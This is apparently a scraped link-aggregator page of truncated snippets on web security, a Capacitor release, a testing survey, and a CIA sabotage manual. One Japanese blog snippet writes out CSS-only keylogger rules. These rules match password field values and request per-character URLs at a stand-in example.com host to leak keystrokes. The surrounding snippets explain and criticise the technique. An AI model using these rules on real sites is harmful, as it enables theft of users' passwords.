Snyk Vulnerability Database | Snyk
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute,
CSSだけでキーロガーを作る(※追記あり) - R42日記
github.com よくもまあこんなこと思いついたなw 要するに、 input[type="password"][value$="a"] { background-image: url("http://example.com/a"); } input[type="password"][value$="b"] { background-image: url("http://example.com/b"); } ... とすることで、キータイプ毎に特定のHTTPリクエストを発生させて、それをサーバ側でキャプチャするわけです。極めて簡単。 これはもう既に悪用されているでしょうなあ… 追記 input[type="password"][value$="a"] { background-image: url("http://example.com/a?id=1234abcd"); } input[
Announcing Capacitor 1.0.0 Alpha
Today we are incredibly excited to announce the alpha release of a major new open source project: Capacitor. Capacitor aims to build a better Native runtime for the future of Ionic apps running everywhere: iOS, Android, Electron, and on the web as a Progressive Web App. Capacitor offers a consistent API that handles operations on the underlying platform in a portable, cross-platform way. That mean
State of Testing Survey 2018 | QA Intelligence
Agile TestingProfessional DevelopmentTest AutomationTest ManagementTest StrategyTesting101 Share your experience with the world The 2025 State of Testing™ Survey is waiting for your thoughts on where our industry and profession is heading. Just a few minutes of your time will make a huge impact on the final and globally shared report What is State of Testing™? The initiative seeks to identify the
CIAのスパイマニュアルに学ぶ「会社をダメにする11の行動様式」
第二次世界大戦時のCIAの秘密資料。題してSimple Sabotage Field Manual。要は、敵国内のスパイが、組織の生産性を落とすためにどのような「サボり」ができるか、という「サボり方ガイド」である。2008年に公開された。(なお、正確に言うと、CIAの前身組織、Office of Strategic Servicesの作成文書である。) 以下、一部を抜粋した意訳です。本文は意訳の後に。 「注意深さ」を促す。スピーディーに物事を進めると先々問題が発生するので賢明な判断をすべき、と「道理をわきまえた人」の振りをする 可能な限り案件は委員会で検討。委員会はなるべく大きくすることとする。最低でも5人以上 何事も指揮命令系統を厳格に守る。意思決定を早めるための「抜け道」を決して許さない 会社内での組織的位置付けにこだわる。これからしようとすることが、本当にその組織の権限内なのか、より
Third party CSS is not safe
A few days ago there was a lot of chatter about a 'keylogger' built in CSS. Some folks called for browsers to 'fix' it. Some folks dug a bit deeper and saw that it only affected sites built in React-like frameworks, and pointed the finger at React. But the real problem is thinking that third party content is 'safe'. Third party images If I include the above, I'm trusting example.com. They may betr
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
Release v3.0.0-alpha.1 · lerna/lerna
Engadget | Technology News & Reviews
compiler errors for humans